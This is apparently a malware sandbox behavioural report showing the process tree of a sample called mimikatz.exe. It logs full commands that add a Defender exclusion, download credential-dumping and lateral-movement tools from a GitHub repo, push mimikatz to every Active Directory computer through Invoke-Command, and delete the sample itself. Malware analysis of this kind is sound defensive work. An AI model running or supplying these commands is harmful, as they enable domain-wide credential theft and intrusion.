| ZeroBOX

mimikatz.exe "C:\Users\test22\AppData\Local\Temp\mimikatz.exe"
1712
- cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
  2140
  - powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
    2200
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
  2332
  - powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
    2392
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
  2476
  - powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
    2536
- cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\mimikatz.exe"
  2700
  - PING.EXE ping 1.1.1.1 -n 1 -w 3000
    2880
- python.exe python --version
  2720
- powershell.exe powershell -Command " $computers = Get-ADComputer -Filter * | Select-Object -ExpandProperty Name Invoke-Command -ComputerName $computers -ScriptBlock { cmd /c 'if not exist C:\WinXRAR mkdir C:\WinXRAR && powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe && C:\WinXRAR\mimikatz.exe' } "
  2732
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py
  2920
  - powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py
    2084
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
  2120
  - powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
    2404
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
  2504
  - powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
    2656
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
  2876
  - powershell.exe powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
    2988

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents